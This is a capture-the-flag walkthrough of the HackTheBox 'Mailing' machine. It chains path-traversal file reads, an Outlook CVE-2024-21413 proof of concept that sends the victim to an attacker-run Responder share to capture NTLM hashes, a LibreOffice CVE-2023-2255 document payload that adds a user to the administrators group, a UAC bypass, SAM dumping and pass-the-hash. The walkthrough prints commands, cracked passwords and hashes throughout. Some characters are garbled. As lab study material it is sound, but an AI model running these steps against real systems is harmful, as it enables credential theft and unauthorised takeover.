Mailing
Recon
Add hostname to dns:
└─$ echo '10.10.11.14 mailing.htb' sudo tee -a /etc/hostsHTTP (80)
From instructions we know that user maya exists and default user user:password was created, probably demo and deleted. (Creds don't work for SMTP)
Get IIS Config:
curl http://mailing.htb/download.php?file=../web.config<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<rewrite>
<rules>
<rule name="HostName" stopProcessing="true">
<match url=".*" />
<conditions>
<add input="{HTTP_HOST}" pattern="^(?:[0-9]{1,_}\.){_}[0-9]{1,_}$" />
</conditions>
<action type="Redirect" url="http://mailing.htb" />
</rule>
</rules>
</rewrite>
</system.webServer>
</configuration>Nothing interesting, but we have LFI.
Find config files of hMailServer:
https://www.hmailserver.com/documentation/v5.4/?page=reference_inifilesettings https://www.hmailserver.com/forum/viewtopic.php?t=14994
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ curl 'http://mailing.htb/download.php?file=../../../../../Program%20Files%20(x86)/hMailServer/Bin/hMailServer.ini' --path-as-is
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ curl 'http://mailing.htb/download.php?file=../../../../../Program%20Files%20(x86)/hMailServer/Data/hMailServer.ini' --path-as-is
File not found. 
Password:
homenetworkingadministrator
Since we are only dealing with SMTP service and nothing else, I tried searching for Microsoft Outlook Remote Code Execution Vulnerability and ended up on CVE-2024-2141_. We know that OS is Windows so that's why Outlook. CVE also needs credentials and we got that too.
Setup responder:
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-2141_-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ sudo responder -I tun0
...
## Note: After some time after sending email
[SMB] NTLMv2-SSP Client : 10.10.11.14
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:d4a8169e98107668:14C4AAF6E158C6FD28AECFA1FB11D2F6:01010000000000008055D20E2DA4DA0150B19C607AD6C_620000000002000800_0005_00_700_70001001E00570049004E002D005_005800_0005500_2004B005700_200_20048005A000400_400570049004E002D005_005800_0005500_2004B005700_200_20048005A002E00_0005_00_700_7002E004C004F004_0041004C000_001400_0005_00_700_7002E004C004F004_0041004C0005001400_0005_00_700_7002E004C004F004_0041004C00070008008055D20E2DA4DA0106000400020000000800_000_0000000000000000000000000200000D49_B88C2E__E_578271052F600A608CAF24E_9D76D45552CB707B69A7B1EC2_0A00100000000000000000000000000000000000090020006_00690066007_002F00_100_0002E00_100_0002E00_100_6002E00_700_4000000000000000000
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\mayaNote: Port 25 didn't work because of TLS, 465 hang and 587 was successful.
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-2141_-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ py CVE-2024-21413.py \
--server 10.10.11.14 \
--port 587 \
--username administrator@mailing.htb \
--password homenetworkingadministrator \
--sender administrator@mailing.htb \
--recipient maya@mailing.htb \
--url //10.10.16.74/uwu \
--subject uwu
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / ah@primepage.de
✅ Email sent successfully.Note: URL is responder's IP (us) and as for share literally anything.
Using responder we are able to dump the hash of the user who visited the link, in this case maya.
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-2141_-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ echo 'maya::MAILING:...0000000' > maya.hash
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-2141_-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ hashcat --show maya.hash
5600 NetNTLMv2 Network Protocol
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-2141_-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ hashcat -m 5600 -a 0 maya.hash $rockyou
hashcat (v6.2.6) starting
MAYA::MAILING:...0000000000:m4y4ngs4ri┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri
Evil-WinRM shell v_.5
*Evil-WinRM* PS C:\Users\maya\Documents> whoami
mailing\maya
*Evil-WinRM* PS C:\Users\maya> tree /f
Folder PATH listing
Volume serial number is 9502-BA18
C:.
| _D Objects
|Contacts
|Desktop
|_ Microsoft Edge.lnk
|_ user.txt
|Documents
|_ mail.py
|_ mail.vbs
_ |_WindowsPowerShell
_ |_Scripts
_ |_InstalledScriptInfosUser.txt
*Evil-WinRM* PS C:\Users\maya> type desktop/user.txt
6a89b3aa31790dac85a279d720a17df4SMTP (25)
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ telnet $target 25
Trying 10.10.11.14...
Connected to 10.10.11.14.
Escape character is '^]'.
220 mailing.htb ESMTP
> EHLO x # Identify service
250-mailing.htb
250-SIZE 20480000
250-AUTH LOGIN PLAIN
250 HELPNote: > symbol indicates client (me)!
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ openssl s_client -crlf -connect $target:465
Connecting to 10.10.11.14
CONNECTED(0000000_)
Cant use SSL_get_servername
depth=0 C=EU, ST=EU\Spain, L=Madrid, O=Mailing Ltd, OU=MAILING, CN=mailing.htb, emailAddress=ruy@mailing.htb
...
220 mailing.htb ESMTP
/* Not relevant
MAIL FROM: ruy@mailing.htb
RCPT TO: maya@mailing.htb
DATA
*/No useful information from raw SMTP interaction.
Privilege Escalation
*Evil-WinRM* PS C:\Users\maya\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================ =======
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Enabled
SeUndockPrivilege Quitar equipo de la estaci¢n de acoplamiento Enabled
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled
SeTimeZonePrivilege Cambiar la zona horaria Enabled
*Evil-WinRM* PS C:\Users\maya\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============ ==================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compa¤¡a Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticaci¢n NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label S-1-16-8192
*Evil-WinRM* PS C:\Users\maya\Documents>Windows Defender is active and WinPeas/PrivescCheck.ps1 got blocked, manual enumerating go...
*Evil-WinRM* PS C:\Program Files> dir
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2024 5:30 PM Common Files
d----- 3/3/2024 4:40 PM dotnet
d----- 3/3/2024 4:32 PM Git
d----- 4/29/2024 6:54 PM Internet Explorer
d----- 3/4/2024 6:57 PM LibreOffice
d----- 3/3/2024 4:06 PM Microsoft Update Health Tools
d----- 12/7/2019 10:14 AM ModifiableWindowsApps
d----- 2/27/2024 4:58 PM MSBuild
d----- 2/27/2024 5:30 PM OpenSSL-Win64
d----- 3/13/2024 4:49 PM PackageManagement
d----- 2/27/2024 4:58 PM Reference Assemblies
d----- 3/13/2024 4:48 PM RUXIM
d----- 2/27/2024 4:32 PM VMware
d----- 3/3/2024 5:13 PM Windows Defender
d----- 4/29/2024 6:54 PM Windows Defender Advanced Threat Protection
d----- 3/3/2024 5:13 PM Windows Mail
d----- 3/3/2024 5:13 PM Windows Media Player
d----- 4/29/2024 6:54 PM Windows Multimedia Platform
d----- 2/27/2024 4:26 PM Windows NT
d----- 3/3/2024 5:13 PM Windows Photo Viewer
d----- 4/29/2024 6:54 PM Windows Portable Devices
d----- 12/7/2019 10:31 AM Windows Security
d----- 3/13/2024 4:49 PM WindowsPowerShellLibreOffice seems out of ordinary Windows installation, usually we have Office applications and considering Outlook was used it's a bit odd.
*Evil-WinRM* PS C:\Program Files> cd LibreOffice
*Evil-WinRM* PS C:\Program Files\LibreOffice> cmd /c "dir /s/b *.txt" | sls -NotMatch extensions
C:\Program Files\LibreOffice\license.txt
C:\Program Files\LibreOffice\help\media\icon-themes\README.txt
C:\Program Files\LibreOffice\program\python-core-3.8.12\lib\lib2to3\Grammar.txt
C:\Program Files\LibreOffice\program\python-core-3.8.12\lib\lib2to3\PatternGrammar.txt
C:\Program Files\LibreOffice\program\python-core-3.8.12\lib\site-packages\README.txt
C:\Program Files\LibreOffice\readmes\readme_en-GB.txt
C:\Program Files\LibreOffice\readmes\readme_en-US.txt
C:\Program Files\LibreOffice\readmes\readme_en-ZA.txt
C:\Program Files\LibreOffice\readmes\readme_es.txt
C:\Program Files\LibreOffice\share\gallery\personas\personas_list.txt
*Evil-WinRM* PS C:\Program Files\LibreOffice> cat 'C:\Program Files\LibreOffice\readmes\readme_en-US.txt' | select -First 10
======================================================================
LibreOffice 7.4 ReadMe
======================================================================Installation is really old:
Before going further into random old software let's check permissions on it first using icacls:
*Evil-WinRM* PS C:\Program Files> icacls LibreOffice
LibreOffice NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administradores:(I)(F)
BUILTIN\Administradores:(I)(OI)(CI)(IO)(F)
BUILTIN\Usuarios:(I)(RX)
BUILTIN\Usuarios:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(RX)
ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(OI)(CI)(IO)(GR,GE)
ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIàN RESTRINGIDOS:(I)(RX)
ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIàN RESTRINGIDOS:(I)(OI)(CI)(IO)(GR,GE)
Successfully processed 1 files; Failed processing 0 filesNormal users have (GR,GE) perms -> Generic Read/Generic Execute
Searching for CVEs: https://www.cvedetails.com/vulnerability-list/vendor_id-11439/product_id-21008/Libreoffice-Libreoffice.html
Vulnerability Details : CVE-2023-2255
Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used "floating frames" linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3.
PoC: CVE-2023-2255
But where to put it? Going back to the root dir I saw interesting directory:
*Evil-WinRM* PS C:\Users\maya> dir /
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/10/2024 5:32 PM Important Documents # <--
d----- 2/28/2024 8:49 PM inetpub
d----- 12/7/2019 10:14 AM PerfLogs
d----- 3/9/2024 1:47 PM PHP
d-r--- 3/13/2024 4:49 PM Program Files
d-r--- 3/14/2024 3:24 PM Program Files (x86)
d-r--- 3/3/2024 4:19 PM Users
d----- 4/29/2024 6:58 PM Windows
d----- 4/12/2024 5:54 AM wwwroot┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ git clone https://github.com/elweth-sec/CVE-2023-2255.git
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ cd CVE-2023-2255
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2023-2255]
└─$ py CVE-2023-2255.py --cmd 'net user naya Password123$ /add && net localgroup administrators naya /add' --output exp.odt
File exp.odt has been created !*Evil-WinRM* PS C:\Important Documents> upload ./CVE-2023-2255/exp.odt
Info: Uploading /home/woyag/Desktop/Rooms/Mailing/CVE-2023-2255/exp.odt to C:\Important Documents\exp.odt
Data: 40760 bytes of 40760 bytes copied
Info: Upload successful!Hmm... some kind of policy was in place (probably) and the user wasn't being created.
Also the group name was incorrect because it's not english:
*Evil-WinRM* PS C:\Important Documents> net user localadmin
User name localadmin
Local Group Memberships *Administradores
Global Group memberships *NingunoRecreate the payload:
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2023-2255]
└─$ py CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output exp2.odt
File exp2.odt has been created !*Evil-WinRM* PS C:\Important Documents> upload ./CVE-2023-2255/exp2.odt
---
wait
--- # The file gets deleted afterwards
*Evil-WinRM* PS C:\Important Documents> net user maya
User name maya
Local Group Memberships *Administradores *Remote Management Use
*Usuarios *Usuarios de escritori
Global Group memberships *NingunoMethod 1
Check UAC Enabled:
*Evil-WinRM* PS C:\Users\maya> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
ConsentPromptBehaviorUser REG_DWORD 0x3
DelayedDesktopSwitchTimeout REG_DWORD 0x0
DisableAutomaticRestartSignOn REG_DWORD 0x1
DSCAutomationHostEnabled REG_DWORD 0x2
EnableCursorSuppression REG_DWORD 0x1
EnableFullTrustStartupTasks REG_DWORD 0x2
EnableInstallerDetection REG_DWORD 0x1
EnableLUA REG_DWORD 0x1 # <---------------
EnableSecureUIAPaths REG_DWORD 0x1
EnableUIADesktopToggle REG_DWORD 0x0
EnableUwpStartupTasks REG_DWORD 0x2
EnableVirtualization REG_DWORD 0x1
PromptOnSecureDesktop REG_DWORD 0x1
SupportFullTrustStartupTasks REG_DWORD 0x1
SupportUwpStartupTasks REG_DWORD 0x1
ValidateAdminCodeSignatures REG_DWORD 0x0
disablecad REG_DWORD 0x0
dontdisplaylastusername REG_DWORD 0x0
legalnoticecaption REG_SZ
legalnoticetext REG_SZ
scforceoption REG_DWORD 0x0
shutdownwithoutlogon REG_DWORD 0x1
undockwithoutlogon REG_DWORD 0x1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\UIPIWe don't have direct access to localadmin directory because UAC is in place. We can utilize RunasCs tool to bypass UAC control and execute any command as admins.
*Evil-WinRM* PS C:\Users\maya> cd $ENV:TEMP
*Evil-WinRM* PS C:\Users\maya\AppData\Local\Temp> upload rc.exe
*Evil-WinRM* PS C:\Users\maya\AppData\Local\Temp> .\rc.exe maya m4y4ngs4ri "powershell -c dir /Users/localadmin" --bypass-uac
Directory: C:\Users\localadmin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2024-03-03 4:40 PM .dotnet
d-r--- 2024-02-27 4:30 PM 3D Objects
d-r--- 2024-02-27 4:30 PM Contacts
d-r--- 2024-04-12 6:10 AM Desktop
d-r--- 2024-03-14 3:39 PM Documents
d-r--- 2024-04-30 9:14 AM Downloads
d-r--- 2024-02-27 4:30 PM Favorites
d-r--- 2024-02-27 4:30 PM Links
d-r--- 2024-02-27 4:30 PM Music
d-r--- 2024-02-27 4:32 PM OneDrive
d-r--- 2024-02-27 4:32 PM Pictures
d-r--- 2024-02-27 4:30 PM Saved Games
d-r--- 2024-02-27 4:31 PM Searches
d-r--- 2024-03-05 3:37 PM Videos
*Evil-WinRM* PS C:\Users\maya\AppData\Local\Temp> .\rc.exe maya m4y4ngs4ri "powershell -c dir /Users/localadmin/Desktop" --bypass-uac
Directory: C:\Users\localadmin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2024-02-27 4:30 PM 2350 Microsoft Edge.lnk
-ar--- 2024-05-12 12:58 PM 34 root.txt
*Evil-WinRM* PS C:\Users\maya\AppData\Local\Temp> .\rc.exe maya m4y4ngs4ri "powershell -c type /Users/localadmin/Desktop/root.txt" --bypass-uac
c7fd0ef937dc6923ac5ba902c202251dMethod 2
Dump the hashes and login via hash into machine:
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ netexec smb 10.10.11.14 -u maya -p m4y4ngs4ri --sam
SMB 10.10.11.14 445 MAILING [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.10.11.14 445 MAILING [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB 10.10.11.14 445 MAILING [*] Dumping SAM hashes
SMB 10.10.11.14 445 MAILING Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.14 445 MAILING Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.14 445 MAILING DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.14 445 MAILING WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB 10.10.11.14 445 MAILING localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB 10.10.11.14 445 MAILING maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB 10.10.11.14 445 MAILING [+] Added 6 SAM hashes to the database
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ evil-winrm -i 10.10.11.14 -u localadmin -H 9aa582783780d1546d62f2d102daefae
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\localadmin\Documents> whoami
mailing\localadmin
*Evil-WinRM* PS C:\Users\localadmin\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\localadmin\Desktop> cat root.txt
c7fd0ef937dc6923ac5ba902c202251dSince we have Admin access we could probably utilize any actions from: https://www.netexec.wiki/smb-protocol/obtaining-credentials
Last updated